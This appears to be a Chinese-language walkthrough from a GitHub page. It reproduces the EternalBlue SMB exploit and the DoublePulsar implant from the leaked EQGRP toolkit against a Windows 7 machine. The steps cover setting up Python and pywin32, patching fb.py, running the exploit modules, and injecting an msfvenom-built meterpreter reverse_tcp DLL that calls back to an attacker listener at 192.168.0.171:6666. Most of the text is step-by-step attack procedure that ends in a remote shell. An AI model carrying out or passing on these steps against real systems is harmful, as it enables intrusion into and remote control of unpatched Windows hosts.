Skip to content

Latest commit

 

History

History
76 lines (36 loc) · 2.66 KB

Windows SMB远程溢出0day复现-边界安全.md

File metadata and controls

76 lines (36 loc) · 2.66 KB

作者:边界安全 原文链接


测试环境:

靶机:windows7 64位旗舰版 445 open

攻击环境:

  1. 下载并安装python2.6

  2. 下载并安装pywin32

  3. 将C:\Python26添加到环境变量PATH中。

下载 EQGRP_Lost_in_Translation,找到\windows\fb.py。

fb.py有个地方需要修改一下:

第26,27,28行注释掉

还有第72行。

打开cmd切入windows目录。执行python fb.py

按照他的要求输入[默认]参数。

然后use Eternalblue,一路回车:

注意的是在这里选择1:

一路回车就可以看到succeeded了。

接着执行use Doublepulsar。

根据实际情况选择64位还是32位。

然后进入关键步骤:

选择运行dll文件,然后输入dll文件的路径,这个dll文件我是用msf生成的。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.171 LPORT=6666 -f dll > msfx64.dll

如果是32位的就生成32位的,如果弄错了也没事,工具会利用失败,重来就可以了。

然后一路回车:

这样子就是成功了。看看msf: